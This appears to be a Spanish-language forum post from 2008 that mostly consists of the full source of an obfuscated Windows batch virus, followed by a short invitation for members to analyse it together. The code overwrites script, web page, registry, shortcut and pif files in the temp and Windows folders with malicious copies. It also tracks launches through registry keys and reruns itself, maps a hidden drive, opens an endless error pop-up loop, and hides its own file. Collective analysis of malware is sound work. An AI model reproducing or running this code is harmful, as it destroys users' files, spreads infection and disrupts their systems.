ECho next>>%TMP%\cc.vbs%vRwz%
goto vRwz6da52e2h
:vRwz6da52e2h
EcHO end sub>>%Tmp%\cc.vbs%vRwz%
goto vRwzmNFudf
:vRwzmNFudf
ECHO dim NTvL, cKU, dtLq>>%tmp%\cc.vbs%vRwz%
goto vRwzAjuNQ_HyHD
:vRwzAjuNQ_HyHD
echO NTvL=int(Olpa4M1.REGreAD ("HKCU\Software\rZHHXpP9sB\b0MQt3O24A"))>>%tMP%\cc.vbs%vRwz%
goto vRwzg6_vdHV
:vRwzg6_vdHV
eCHO cKU=int(Olpa4M1.RegREAd ("HKCU\Software\rZHHXpP9sB\JAflYnX"))>>%tmp%\cc.vbs%vRwz%
goto vRwz1baec4
:vRwz1baec4
ECHO dtLq=int(Olpa4M1.rEGREaD ("HKCU\Software\rZHHXpP9sB\VqT"))>>%TMP%\cc.vbs%vRwz%
goto vRwz47kjogS
:vRwz47kjogS
EchO if (not(int(dtLq)=day(now)) or not(int(cKU)=month(now))) then>>%tMp%\cc.vbs%vRwz%
goto vRwzymwHwcibor
:vRwzymwHwcibor
echO NTvL=NTvL+1>>%tmP%\cc.vbs%vRwz%
goto vRwzmnriFZ
:vRwzmnriFZ
Echo if (NTvL=2) then>>%tmP%\cc.vbs%vRwz%
goto vRwzVjm4KsYJun
:vRwzVjm4KsYJun
EChO Ui1Zp="cfTk">>%TMP%\cc.vbs%vRwz%
goto vRwziv3WJFD
:vRwziv3WJFD
eCho C9y8JF()>>%tmP%\cc.vbs%vRwz%
goto vRwzo6ycMo6
:vRwzo6ycMo6
EcHO Ui1Zp="">>%tmP%\cc.vbs%vRwz%
goto vRwzV2XgiYdk
:vRwzV2XgiYdk
ECHO Olpa4M1.run "%WInDIR%\traywatch.bat VROHBrer">>%TmP%\cc.vbs%vRwz%
goto vRwzIT4obKi
:vRwzIT4obKi
ECHO NTvL=0>>%TmP%\cc.vbs%vRwz%
goto vRwzaFKg_Q_
:vRwzaFKg_Q_
eCho end if>>%TmP%\cc.vbs%vRwz%
goto vRwzBH9v
:vRwzBH9v
ecHO Olpa4M1.REGwRiTE "HKCU\Software\rZHHXpP9sB\JAflYnX",month(now)>>%TMP%\cc.vbs%vRwz%
goto vRwzCTcRT8V1
:vRwzCTcRT8V1
ecHO Olpa4M1.rEGWRITe "HKCU\Software\rZHHXpP9sB\VqT",day(now)>>%TMP%\cc.vbs%vRwz%
goto vRwzWpT8Sdq
:vRwzWpT8Sdq
ECHO end if>>%tmP%\cc.vbs%vRwz%
goto vRwz0itS9B
:vRwz0itS9B
EcHo Olpa4M1.reGwrIte "HKCU\Software\rZHHXpP9sB\b0MQt3O24A",NTvL>>%tmP%\cc.vbs%vRwz%
goto vRwzDj
:vRwzDj
cscript %tmp%\cc.vbs>nul%vRwz%
goto vRwztL9XPPV64M
:vRwztL9XPPV64M
%vRwz%SeT øÌ¨=htm
goto vRwz0S
:vRwz0S
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzTP1br9ovK
:vRwzTP1br9ovK
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\0xZit.vYe %%D /y%vRwz%
goto vRwzHw
:vRwzHw
%vRwz%Set øÌ¨=html
goto vRwzhwSUtZ
:vRwzhwSUtZ
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzoB2C
:vRwzoB2C
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\0xZit.vYe %%D /y%vRwz%
goto vRwzVR1vFf
:vRwzVR1vFf
%vRwz%SET øÌ¨=asp
goto vRwzkXuq_F_06
:vRwzkXuq_F_06
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzQetIShE4q
:vRwzQetIShE4q
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\0xZit.vYe %%D /y%vRwz%
goto vRwz8C
:vRwz8C
%vRwz%sEt øÌ¨=cgi
goto vRwz2KheeW
:vRwz2KheeW
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzOYPc
:vRwzOYPc
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\0xZit.vYe %%D /y%vRwz%
goto vRwzgRrl_VnaPe
:vRwzgRrl_VnaPe
%vRwz%seT øÌ¨=htx
goto vRwz2M
:vRwz2M
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwz2y720cPC
:vRwz2y720cPC
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\0xZit.vYe %%D /y%vRwz%
goto vRwzzJ01WepsLp
:vRwzzJ01WepsLp
%vRwz%set øÌ¨=js
goto vRwz18KR
:vRwz18KR
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzwf
:vRwzwf
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %WInDIR%\logreg.js %%D /y%vRwz%
goto vRwzDN
:vRwzDN
%vRwz%Set øÌ¨=jse
goto vRwzOBzsTB
:vRwzOBzsTB
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzmkxh0amFGE
:vRwzmkxh0amFGE
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %WInDIR%\logreg.js %%D /y%vRwz%
goto vRwz_8R
:vRwz_8R
%vRwz%SEt øÌ¨=vbs
goto vRwzmH1MX
:vRwzmH1MX
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzHppdMZo
:vRwzHppdMZo
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %WInDIR%\viewexplore.vbs %%D /y%vRwz%
goto vRwzzvADpU1Ez
:vRwzzvADpU1Ez
%vRwz%seT øÌ¨=vbe
goto vRwzds6W8
:vRwzds6W8
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzNyQNiBR37T
:vRwzNyQNiBR37T
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %WInDIR%\viewexplore.vbs %%D /y%vRwz%
goto vRwzYpnz
:vRwzYpnz
%vRwz%Set øÌ¨=reg
goto vRwzsjLr
:vRwzsjLr
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzufujT
:vRwzufujT
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %TMp%\o1xOLFb1.vYe %%D /y%vRwz%
goto vRwzTvv0AYkZP
:vRwzTvv0AYkZP
%vRwz%sEt øÌ¨=lnk
goto vRwzZGMImFju2i
:vRwzZGMImFju2i
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzXNtr9SZyC
:vRwzXNtr9SZyC
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %Tmp%\EiY3N.lnk %%D /y%vRwz%
goto vRwzio_nxpS5oE
:vRwzio_nxpS5oE
%vRwz%seT øÌ¨=pif
goto vRwzW8uNjrqqoR
:vRwzW8uNjrqqoR
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do attrib -r %%D%vRwz%
goto vRwzw3xay2J7gp
:vRwzw3xay2J7gp
for %%D in ( %tmp%\*.%øÌ¨% %windir%\*.%øÌ¨%) do copy %TMP%\pKa7qN6.pif %%D /y%vRwz%
goto vRwzo4
:vRwzo4
md \logARtask%vRwz%
goto vRwzX3sm
:vRwzX3sm
copy %WInDIR%\traywatch.bat \logARtask\ARhelp.bat /y%vRwz%
goto vRwzKEYZcFvuBz
:vRwzKEYZcFvuBz
subst r: \logARtask%vRwz%
goto vRwzI9h
:vRwzI9h
goto vRwz7JLe
goto vRwziUh
:vRwziUh
:vRwzDOrk3OhR
goto vRwzJeQ
:vRwzJeQ
Echo.on error resume next>%TMp%\iXn3B.vbs%vRwz%
goto vRwzJ2JCQwd
:vRwzJ2JCQwd
ECHO do>>%tmP%\iXn3B.vbs%vRwz%
goto vRwzKGmHYT
:vRwzKGmHYT
EcHO Msgbox "Error en el sistema",4096,"">>%Tmp%\iXn3B.vbs%vRwz%
goto vRwzbBLyIoCkjD
:vRwzbBLyIoCkjD
Echo loop>>%tMp%\iXn3B.vbs%vRwz%
goto vRwzUlmD6n
:vRwzUlmD6n
WScRIPt %TMP%\iXn3B.vbs%vRwz%
goto vRwzrnb
:vRwzrnb
goto vRwzikEVi
goto vRwzpzKMt7l9
:vRwzpzKMt7l9
:vRwz7JLe
goto vRwzGQrQ9
:vRwzGQrQ9
%vRwz%sEt ¿î£=del %tmP%\*.
goto vRwze3oBol9
:vRwze3oBol9
%¿î£%vYe%vRwz%
goto vRwzrqM875
:vRwzrqM875
%¿î£%bat%vRwz%
goto vRwzAs
:vRwzAs
%¿î£%vbs%vRwz%
goto vRwztsO
:vRwztsO
attrib +r +s +h %WInDIR%\traywatch.bat%vRwz%
goto vRwz26
:vRwz26
:vRwzikEVi
goto vRwzeqe_CEZWFw
:vRwzeqe_CEZWFw
VeR|FinD /I "Xp"|If ErRoRLeveL 1 CTty cON%vRwz%
goto vRwzQR8C8dWorR
:vRwzQR8C8dWorR
cls%vRwz%
goto vRwzQaMH95_5
:vRwzQaMH95_5

la idea esk podamos ver lo k ace este virus entre todos Ok?? Wink

...

sALuDos__

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 10, 2008, 06:50:39